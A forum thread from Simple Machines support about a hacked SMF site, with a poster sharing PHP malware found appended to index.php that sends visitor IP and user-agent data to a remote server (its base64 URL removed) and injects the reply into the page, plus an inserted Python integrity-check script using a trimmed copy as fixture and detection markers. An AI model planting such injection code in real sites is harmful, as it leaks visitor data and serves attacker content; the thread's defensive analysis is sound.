
Nasty, Hidden Virus on Simple Machines

Started by Flavious, October 06, 2011, 04:47:06 PM


OCJ

#60
Update ... hacked again.


Site was a bit slow and then AVG browser guard started giving warnings. I don't have access logs older than a few days and wouldn't know what to look for anyway. It seems like the index.php file was changed before the last data in the raw logs, on the 28th of April.

Not sure how they are getting access, but this time I will get the server reset and start over with new files and passwords.

This is the code added on to the end of the index.php file while I was away on a trip.


<?php
if (!isset($sRetry))
{
    global $sRetry;
    $sRetry = 1;

    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    // Despite the comments, this branch runs only when the user agent matches NONE of the
    // strings below: ordinary visitors on browsers other than Chrome/Safari/Opera, never crawlers.
    if ((strstr($sUserAgent, 'google') == false) && (strstr($sUserAgent, 'yahoo') == false) && (strstr($sUserAgent, 'baidu') == false) && (strstr($sUserAgent, 'msn') == false) && (strstr($sUserAgent, 'opera') == false) && (strstr($sUserAgent, 'chrome') == false) && (strstr($sUserAgent, 'bing') == false) && (strstr($sUserAgent, 'safari') == false) && (strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if (isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) { // Create  bot analitics
            // Remote URL is hidden in base64 (removed here); visitor IP, UA, host and path are sent to it
            $stCurlLink = base64_decode('{snap}') . '?ip=' . urlencode($_SERVER['REMOTE_ADDR']) . '&useragent=' . urlencode($sUserAgent) . '&domainname=' . urlencode($_SERVER['HTTP_HOST']) . '&fullpath=' . urlencode($_SERVER['REQUEST_URI']) . '&check=' . isset($_GET['look']);
            @$stCurlHandle = curl_init($stCurlLink);
        }
    }
    if ($stCurlHandle !== NULL)
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
        $sResult = @curl_exec($stCurlHandle);
        // Whatever the remote server returns after a leading "O" is written straight into the page
        if ($sResult[0] == "O")
        {
            $sResult[0] = " ";
            echo $sResult; // Statistic code end
        }
        curl_close($stCurlHandle);
    }
}
?>


(edit: removed base64 string to render code (semi-)unusable)

nend

#61
If you decode the base64 that is in the script you end up with this URL.

http://{snap}.com/stat/stat.php

The site is unavailable though.  :-\

(edit: removed possible malicious URL)

青山 素子

You shouldn't be posting whole code and URLs like that, especially if there is the chance that it will or may be accessible.

I put in a report asking the team on the site to obfuscate the code and URL a bit so people won't be tempted to try things.
Motoko-chan
Director, Simple Machines

Note: Unless otherwise stated, my posts are not representative of any official position or opinion of Simple Machines.


NanoSector

I got rid of the URL and the base64_decode in the posts. I posted a copy of the base64_decode in the moderation report.
My Mods / Mod Builder - A tool to easily create mods / Blog
"I've heard from a reliable source that the Answer is 42. But, still no word on what the question is."

Robert.

Something you might want to do, is adding "die;" right before "?>" in index.php. So even if malicious code is added, none of your users will notice it. :)

青山 素子

Quote from: 医生唱片骑师 on May 04, 2012, 06:40:21 AM
Something you might want to do, is adding "die;" right before "?>" in index.php. So even if malicious code is added, none of your users will notice it. :)

That only works if the code is at the end. I've seen it injected at the front as well. At best, you will have maybe a 50% chance of it helping.
Motoko-chan
Director, Simple Machines

Note: Unless otherwise stated, my posts are not representative of any official position or opinion of Simple Machines.
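The two points made above (the block appended to index.php in #60, and the `die;` trick only helping when the injection lands at the end of the file) both come down to one thing: knowing which files changed. The script below is an added example, not code from this thread or from Simple Machines. It hashes every .php file under a known-clean web root into a baseline, diffs the live tree against that baseline (an edit anywhere in a file, front or end, changes its hash), and separately flags files that carry all of the markers of the posted block: a URL rebuilt with `base64_decode`, a `curl_init`/`curl_exec` fetch, and the reply being echoed. The web root, the clean index.php, the Sources/ directory and the trimmed injection are all constructed in a temp dir; the base64 placeholder decodes to the literal `{snap}`, not to any real host.

```python
#!/usr/bin/env python3
"""Added example, not code from this thread or from SMF: hash a known-clean PHP
web root, diff the live tree against it, and flag files carrying the markers of
the injected block in #60. The web root, its files and the trimmed injection
are constructed in a temp dir below; every path and file name is an assumption."""
import hashlib
import json
import re
import tempfile
from pathlib import Path

# Markers lifted from the posted block: URL rebuilt with base64_decode, fetched
# with curl, reply echoed into the page. All must match before a file is flagged.
MARKERS = (r"base64_decode\s*\(", r"curl_init\s*\(", r"curl_exec\s*\(", r"echo\s+\$\w+")

# Constructed stand-in for a clean index.php. It echoes a variable on purpose:
# one marker alone is not evidence, legitimate code does that constantly.
CLEAN_INDEX = "<?php\n// constructed stand-in for SMF index.php\n$forum_version = 'x';\necho $forum_version;\n?>\n"

# Trimmed, constructed version of the posted tail; 'e3NuYXB9' decodes to the
# literal placeholder '{snap}', not to any real host.
INJECTED_TAIL = """<?php
if (!isset($sRetry)) {
    $sRetry = 1;
    $stCurlLink = base64_decode('e3NuYXB9') . '?ip=' . urlencode($_SERVER['REMOTE_ADDR']);
    $stCurlHandle = curl_init($stCurlLink);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0] == "O") { $sResult[0] = " "; echo $sResult; }
}
?>
"""

def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def build_baseline(webroot: Path) -> dict:
    """relative path -> sha256 for every .php under webroot; take it from a
    freshly uploaded package, before the site is exposed again."""
    return {str(p.relative_to(webroot)): sha256_of(p) for p in sorted(webroot.rglob("*.php"))}

def diff_against_baseline(webroot: Path, baseline: dict) -> dict:
    """Any byte changed anywhere in a file shows up here, unlike a trailing die;."""
    current = build_baseline(webroot)
    return {
        "modified": sorted(k for k in current if k in baseline and current[k] != baseline[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }

def markers_found(path: Path) -> list:
    text = path.read_text(errors="replace")
    return [m for m in MARKERS if re.search(m, text)]

def looks_injected(path: Path) -> bool:
    return len(markers_found(path)) == len(MARKERS)

def demo() -> dict:
    """Baseline a clean tree, plant the tail the way #60 describes, report."""
    root = Path(tempfile.mkdtemp())
    (root / "Sources").mkdir()
    (root / "index.php").write_text(CLEAN_INDEX)
    (root / "Sources" / "Load.php").write_text("<?php\n// constructed stand-in\n$x = 1;\n?>\n")
    baseline = build_baseline(root)
    (root / "baseline.json").write_text(json.dumps(baseline, indent=1))  # keep this outside the web root in practice

    with (root / "index.php").open("a") as f:               # attacker appends to index.php ...
        f.write(INJECTED_TAIL)
    (root / "Sources" / "x.php").write_text(INJECTED_TAIL)  # ... and drops a new file

    report = diff_against_baseline(root, json.loads((root / "baseline.json").read_text()))
    report["injected"] = sorted(str(p.relative_to(root)) for p in root.rglob("*.php") if looks_injected(p))
    return report

if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

The hash diff is the reliable signal: it reports index.php as modified and Sources/x.php as added no matter where in the file the code was inserted. The marker check is only a triage aid tuned to this one sample; SMF itself ships code that uses curl and echoes variables, so treat a marker hit on an unmodified file as a prompt to read it, not as proof.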


OCJ

#66
update:

One thing happened today that also happened at the time the site was first hacked, and only those times.

This was related to playing movies in Aeva Media. It shows that a plugin is required and a link to download it. Someone clicked it and got a virus warning.. and infection. So much for their security shield.
Last time the site had trouble I also tried using the Aeva movie plugin download link. It didn't work for playing the movies either. These actions only happened twice and both were coincidentally related to virus trouble through SMF/Aeva Media.

I know some so-called free Firefox plugins from a dodgy commercial site have caused similar problems.

Not sure if this error is related or not.

XML Parsing Error: junk after document element
Location: http://site .com/index.php?action=media;sa=mass;album=37;xml;upcook=YTo0OntpOjA7czozOiIxOTMiO2k6MTtzOjQwOiI5OTNiNTQzNDIwOWQzYTNjOTAwYTA3YmZkNmQ2ODU4MDA2MDBiNmQyIjtpOjI7aToxNTEzMjkzNzI3O2k6MztpOjE7fQ%3D%3D
Line Number 14, Column 2:    <div class="centertext"><a href="javascript:history.go(-1)">Back</a></div>
--------^
